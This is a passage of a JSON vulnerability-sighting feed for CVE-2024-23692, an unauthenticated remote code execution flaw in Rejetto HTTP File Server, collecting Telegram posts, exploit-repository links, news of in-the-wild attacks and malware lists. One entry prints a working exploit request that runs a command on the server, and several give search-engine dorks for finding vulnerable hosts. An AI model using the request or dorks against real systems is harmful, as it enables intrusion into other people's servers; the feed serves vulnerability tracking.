"0ccd0519-a697-4964-af07-1d207ea61ac6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7519", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:53.000000Z"}, {"uuid": "d1201f2a-b61f-4003-8101-8174e369e36e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7426", "content": "Tools - Hackers Factory \n\nNetwork scanner & notification framework\n\nScans for devices connected to your network and alerts you if new and unknown devices are found.\n \nhttps://github.com/jokob-sk/NetAlertX\n\nThis repo contains my pentesting template that I have used in PWK and for current assessments. The template has been formatted to be used in Obsidian\n\nhttps://github.com/tjnull/TJ-OPT\n\nAgartha \ud83c\udff4\u200d\u2620\ufe0f  A burp extension for dynamic payload \ngeneration to detect injection flaws (RCE, LFI, SQLi)\n \nhttps://github.com/0xSojalSec/agartha\n\nCVE-2024-8190: Ivanti Cloud Service Appliance Authenticated Command Injection\n\nhttps://github.com/horizon3ai/CVE-2024-8190\n\nInception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces\n\nhttps://github.com/carmaa/inception\n\nNyxInvoke is a Rust CLI tool for running .NET assemblies, PowerShell, and BOFs with Patchless AMSI and ETW bypass features. with Dual-build support\n\nhttps://github.com/BlackSnufkin/NyxInvoke\n\nDarkGPT is an OSINT assistant based on GPT-4-200K (recommended use) designed to perform queries on leaked databases, thus providing an artificial intelligence assistant that can be useful in your traditional OSINT processes.\n\nhttps://github.com/luijait/DarkGPT\n\nOSINT tool to crawl a site and extract useful recon info.\n\nhttps://github.com/chm0dx/creepyCrawler\n\nWrite and deploy websites using the C Programming Language.\n\nhttps://github.com/KDesp73/webc\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-09-19T05:20:08.000000Z"}, {"uuid": "94487149-178e-4b41-bf5e-b54f48f21b58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "exploited", "source": "https://t.me/true_secator/5939", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 AhnLab ASEC \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u043e\u0431 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u044b HTTP File Server (HFS) \u043e\u0442 Rejett \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 CVE-2024-23692, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2023 \u0433\u043e\u0434\u0430 \u0438 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0432 \u043c\u0430\u0435 \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u0438 \u0434\u043e 2.3m \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c Rejetto \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0447\u0442\u043e \u0432\u0435\u0440\u0441\u0438\u0438 \u0441 2.3m \u043f\u043e 2.4 \u043e\u043f\u0430\u0441\u043d\u044b \u0438 \u043d\u0435 \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u043e\u043b\u044c\u0448\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0438\u0437-\u0437\u0430 \u043e\u0448\u0438\u0431\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u044d\u0442\u043e, HFS 2.3m \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0441\u0442\u044c\u044e \u0441\u0440\u0435\u0434\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0445 \u0433\u0440\u0443\u043f\u043f, \u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0439 \u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432, \u0438, \u043a\u0430\u043a \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 AhnLab, \u0442\u0430\u043a\u0436\u0435 \u0432\u043e\u0441\u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0430 \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438.\n\nPoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b \u0438 \u043c\u043e\u0434\u0443\u043b\u044c Metasploit \u0441\u0442\u0430\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0441\u0440\u0430\u0437\u0443 \u0432\u0441\u043a\u043e\u0440\u0435 \u043f\u043e\u0441\u043b\u0435 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438, \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c ASEC, \u0442\u043e\u0433\u0434\u0430 \u0436\u0435 \u0438 \u043d\u0430\u0447\u0430\u043b\u0430\u0441\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u0412 \u0445\u043e\u0434\u0435 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u044b\u0445 \u0430\u0442\u0430\u043a \u0445\u0430\u043a\u0435\u0440\u044b \u0432\u0435\u0434\u0443\u0442 \u0441\u0431\u043e\u0440 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u044e\u0442 \u0431\u044d\u043a\u0434\u043e\u0440\u044b \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0448\u0442\u0430\u043c\u043c\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0442\u0438\u043f\u0430 whoami \u0438 arp \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0438 \u0442\u0435\u043a\u0443\u0449\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0438 \u043e\u0431\u0449\u0435\u0433\u043e \u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439.\n\n\u0412\u043e \u043c\u043d\u043e\u0433\u0438\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0437\u0430\u0432\u0435\u0440\u0448\u0430\u044e\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 HFS \u043f\u043e\u0441\u043b\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u043e\u0432\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0433\u0440\u0443\u043f\u043f\u0443 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432, \u0447\u0442\u043e\u0431\u044b \u0432\u043e\u0441\u043f\u0440\u0435\u043f\u044f\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u043e\u043f\u044b\u0442\u043a\u0430\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0433\u043e.\n\n\u041d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u044d\u0442\u0430\u043f\u0430\u0445 \u0430\u0442\u0430\u043a ASEC \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0430 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0443 XMRig \u0434\u043b\u044f \u043c\u0430\u0439\u043d\u0438\u043d\u0433\u0430 Monero, \u043e\u0434\u043d\u0430 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u044b\u043b\u0430 \u043f\u0440\u0438\u043f\u0438\u0441\u0430\u043d\u0430 \u0433\u0440\u0443\u043f\u043f\u0435 LemonDuck.\n\n\u0421\u0440\u0435\u0434\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u043d\u0430\u0433\u0440\u0443\u0437\u043e\u043a, \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0435 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u044b: XenoRAT (\u0432\u043c\u0435\u0441\u0442\u0435 \u0441 XMRig), Gh0stRAT (\u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043a\u0440\u0430\u0436\u0438 \u0434\u0430\u043d\u043d\u044b\u0445), PlugX (\u0431\u044d\u043a\u0434\u043e\u0440 \u0434\u043b\u044f \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430), \u0430 \u0442\u0430\u043a\u0436\u0435 GoThief (\u0438\u043d\u0444\u043e\u0441\u0442\u043b\u043b\u0435\u0440).\n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c\u044b\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430 - 0.52.x, \u043a\u043e\u0442\u043e\u0440\u044b\u0439, \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0431\u043e\u043b\u0435\u0435 \u043d\u0438\u0437\u043a\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e, \u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c \u0440\u0435\u043b\u0438\u0437\u043e\u043c HFS \u043e\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430.\n\n\u041e\u043d \u0432\u0435\u0431-\u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d, \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043c\u0438\u043d\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0439 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438, \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 HTTPS, \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e DNS \u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u043f\u0430\u043d\u0435\u043b\u0438.\n\n\u0412 \u043e\u0442\u0447\u0435\u0442\u0435\u00a0AhnLab \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u043d\u0430\u0431\u043e\u0440 IoC, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0445\u044d\u0448\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e, IP-\u0430\u0434\u0440\u0435\u0441\u0430 C2, \u0430 \u0442\u0430\u043a\u0436\u0435 URL-\u0430\u0434\u0440\u0435\u0441\u0430 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0433\u043e \u0432 \u0430\u0442\u0430\u043a\u0430\u0445.", "creation_timestamp": "2024-07-05T12:30:05.000000Z"}, {"uuid": "cec1f096-1389-40bb-b2d6-29276b6f8cd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/Root_Exploit/736", "content": "CVE-2024-23692\n\n\ud83d\udcac\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692 \n\nFofa Dork: \"HttpFileServer\" && server==\"HFS 2.3m\"\n\n\ud83d\udcbb Run:\ncd CVE-2024-23692\n./CVE-2024-23692.sh   \n\nGithub\n\n\u2b07\ufe0f Download\n\ud83d\udd12 Root_Exploit\n\n#Rce #Exploit #CVE\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n\ud83d\udce3 @BugCod3\n\ud83d\udce3 @Root_Exploit", "creation_timestamp": "2024-09-18T22:33:30.000000Z"}, {"uuid": "1d4205cb-a30a-4ebd-8041-6e66f047e37e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3190", "content": "https://github.com/verylazytech/CVE-2024-23692\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n#github #exploit", "creation_timestamp": "2024-09-19T04:04:16.000000Z"}, {"uuid": "07f10a2d-4d13-44d6-a2d4-4c26e417421d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/Root_Exploit/742", "content": "CVE-2024-23692 POC - Unauthenticated RCE Flaw in Rejetto HTTP File Server \ud83e\udeb2\n\nFofa Dork: \"HttpFileServer\" && server==\"HFS 2.3m\"\n\nExploit \ud83d\udd2a \n\n#Exploit #Cve #Poc\n\nJoin RootExploit \ud83d\udc8e", "creation_timestamp": "2024-09-19T14:03:49.000000Z"}, {"uuid": "6aac9ac1-36c1-4c96-8406-95772a4d3a42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "https://t.me/thehackernews/5293", "content": "CERT-UA has alerted of a new spear-phishing campaign targeting a Ukrainian research institution with malware named HATVIBE and CHERRYSPY, exploiting a CVE-2024-23692 vulnerability. \n \nLearn more: https://thehackernews.com/2024/07/ukrainian-institutions-targeted-using.html", "creation_timestamp": "2024-07-23T11:09:37.000000Z"}, {"uuid": "273b80e7-3def-4f42-8076-ebf10686c1ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2650", "content": "https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/\n\nRejetto HTTP File Server 2.3m Unauthenticated RCE \ncve-2024-23692\n#\u5206\u6790 #poc", "creation_timestamp": "2024-06-11T17:45:26.000000Z"}, {"uuid": "f1df5af3-6992-4035-90e0-355dfc9eddbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "https://t.me/vxunderground/4854", "content": "Updates:\n\nFamilies: \n- AgentTesla\n- AsyncRAT\n- CryptBot\n- DarkComet\n- DCRat\n- FormBook\n- GuLoader\n- Latrodectus\n- LummaStealer\n- Mirai\n- OxyPumper\n- RedLine\n- Remcos\n- RevengeRAT\n- SnakeKeylogger\n- STRRAT\n- TrickBot\n- XMRig\n- XWorm\n- ZharkRAT\n\nPapers:\n- 2012-10-02 - Blackhole Exploit Kit: Rise and Evolution.pdf\n- 2015-09-15 - In Pursuit of Optical Fibers and Troop Intel: Targeted Attack Distributes PlugX in Russia.pdf\n- 2015-09-24 - Meet GreenDispenser: A New Breed of ATM Malware.pdf\n- 2021-12-22 - Establishing the TigerRAT and TigerDownloader Malware Families.pdf\n- 2022-04-27 - BRONZE PRESIDENT Targets Russian Speakers with Updated PlugX.pdf\n- 2022-08-22 - Ocean Lotus APT Group.pdf\n- 2022-10-12 - TOAD attacks: Vishing combined with Android banking malware now targeting Italian banks.pdf\n- 2023-04-14 - SHATTEREDGLASS Server Emulator.pdf\n- 2023-07-03 - Chinese Threat Actors Targeting Europe in SmugX Campaign.pdf\n - 2023-07-29 - Unknown powershell backdoor with ties to new Zloader.pdf\n- 2023-09-14 - Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets.pdf\n- 2023-12-11 - Mustang Panda's PlugX new variant targetting Taiwanese government and diplomats.pdf\n- 2024-01-24 - The Endless Struggle Against APT10- Insights from LODEINFO v0.6.6 - v0.7.3 Analysis.pdf\n- 2024-03-04 - On-Device Fraud on the rise: exposing a recent Copybara fraud campaign.pdf\n- 2024-03-22 - APT29 Uses WINELOADER to Target German Political Parties.pdf\n- 2024-03-22 - Large-Scale StrelaStealer Campaign in Early 2024.pdf\n- 2024-03-24 - Analysis of DEV#POPPER: New Attack Campaign Targeting Software Developers Likely Associated With North Korean Threat Actors.pdf\n- 2024-04-02 - Updated StrelaStealer Targeting European Countries.pdf\n- 2024-04-19 - Gold Pickaxe iOS Technical Analysis- IPA Overview and C2 Communication Start up.pdf\n- 2024-04-27 - Finding Malware: Detecting SOGU with Google Security Operations.pdf\n- 2024-06-09 - New Threat: A Deep Dive Into the Zergeca Botnet.pdf\n- 2024-06-24 - StrelaStealer Resurgence: Tracking a JavaScript-Driven Credential Stealer Targeting Europe.pdf\n- 2024-07-05 - CLEARFAKE Update Tricks Victim into Executing Malicious PowerShell Code.pdf\n- 2024-07-09 - Italian government agencies and companies in the target of a Chinese APT.pdf\n- 2024-07-10 - DodgeBox: A deep dive into the updated arsenal of APT41 - Part 1.pdf\n- 2024-07-11 - Brief technical analysis of the 'Poseidon Stealer' malware.pdf\n- 2024-07-11 - ClickFix Deception: A Social Engineering Tactic to Deploy Malware.pdf\n- 2024-07-11 - CRYSTALRAY: Inside the Operations of a Rising Threat Actor Exploiting OSS Tools.pdf\n- 2024-07-11 - MoonWalk: A deep dive into the updated arsenal of APT41 - Part 2.pdf\n- 2024-07-14 - Fake AWS Packages Ship Command and Control Malware In JPEG Files.pdf\n- 2024-07-14 - Malware Analysis: Rhadamanthys.pdf\n- 2024-07-15 - CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks.pdf\n- 2024-07-16 - MirrorFace Attack against Japanese Organisations.pdf\n- 2024-07-16 - NullBulge: Threat Actor Masquerades as Hacktivist Group Rebelling Against AI.pdf\n- 2024-07-17 - The Return of Ghost Emperor's Demodex.pdf\n- 2024-07-18 - Emerging IoT Wiper Malware: Kaden and New LOLFME Botnet Variants.pdf\n- 2024-07-23 - A Simple Approach to Discovering Oyster Backdoor Infrastructure.pdf\n- 2024-07-24 - APT45: North Korea's Digital Military Machine.pdf\n- 2024-07-24 - Malware Campaign Lures Users With Fake W2 Form.pdf\n- 2024-07-24 - Rhysida using Oyster Backdoor to deliver ransomware.pdf\n- 2024-07-24 - UAC-0063 Attack Detection: Hackers Target Ukrainian Research Institutions Using HATVIBE, CHERRYSPY, and CVE-2024-23692.pdf\n- 2024-07-25 - Growing Number of Threats Leveraging AI.pdf\n- 2024-07-28 - CyberGate Technical Analysis.pdf\n- 2024-07-30 - Too big to care: Our disappointment with Cloudflare's anti-abuse posture.pdf\n- 2024-07-31 - Research Update: Threat Actors Behind the DEV#POPPER Campaign Have Retooled and are Continuing to Target Software Developers via Social Engineering.pdf\n- 2024-08-01", "creation_timestamp": "2024-08-27T20:27:19.000000Z"}, {"uuid": "4f387142-e5c2-4b94-8755-483d4685d890", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2677", "content": "cve-2024-23692\n\nGET /?n=%0A&cmd=netstat&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1\n\nnetstat\n\n#exploit #poc", "creation_timestamp": "2024-06-16T06:08:52.000000Z"}, {"uuid": "58dd9c7f-aed8-43d1-b3ad-01110695fb55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/10787", "content": "#Threat_Research\n1. Attack Cases Against HTTP File Server (HFS) (CVE-2024-23692)\nhttps://asec.ahnlab.com/en/67650\n2. Hackers Exploiting HTTP File Server RCE Vulnerability in Wild\nhttps://cybersecuritynews.com/exploiting-http-file-server", "creation_timestamp": "2024-09-02T14:25:31.000000Z"}, {"uuid": "d4ba7a5e-1c86-40db-bfbb-b121e431be85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "https://t.me/BlackLineCH/18", "content": "\u2604\ufe0fCVE-2024-23692:Unauthenticated RCE Flaw in Rejetto HTTP File Server\n \n\n\ud83d\udc80Dork: \nHUNTER: web.body=\"HttpFileServer\"&&header.server==\"HFS 2.3m\"", "creation_timestamp": "2024-09-20T19:13:14.000000Z"}, {"uuid": "1f9d9568-cf4f-4238-ac46-cdb1598d8cd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/315", "content": "Tools - Hackers Factory \n\nNetwork scanner & notification framework\n\nScans for devices connected to your network and alerts you if new and unknown devices are found.\n \nhttps://github.com/jokob-sk/NetAlertX\n\nThis repo contains my pentesting template that I have used in PWK and for current assessments. The template has been formatted to be used in Obsidian\n\nhttps://github.com/tjnull/TJ-OPT\n\nAgartha \ud83c\udff4\u200d\u2620\ufe0f  A burp extension for dynamic payload \ngeneration to detect injection flaws (RCE, LFI, SQLi)\n \nhttps://github.com/0xSojalSec/agartha\n\nCVE-2024-8190: Ivanti Cloud Service Appliance Authenticated Command Injection\n\nhttps://github.com/horizon3ai/CVE-2024-8190\n\nInception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces\n\nhttps://github.com/carmaa/inception\n\nNyxInvoke is a Rust CLI tool for running .NET assemblies, PowerShell, and BOFs with Patchless AMSI and ETW bypass features. with Dual-build support\n\nhttps://github.com/BlackSnufkin/NyxInvoke\n\nDarkGPT is an OSINT assistant based on GPT-4-200K (recommended use) designed to perform queries on leaked databases, thus providing an artificial intelligence 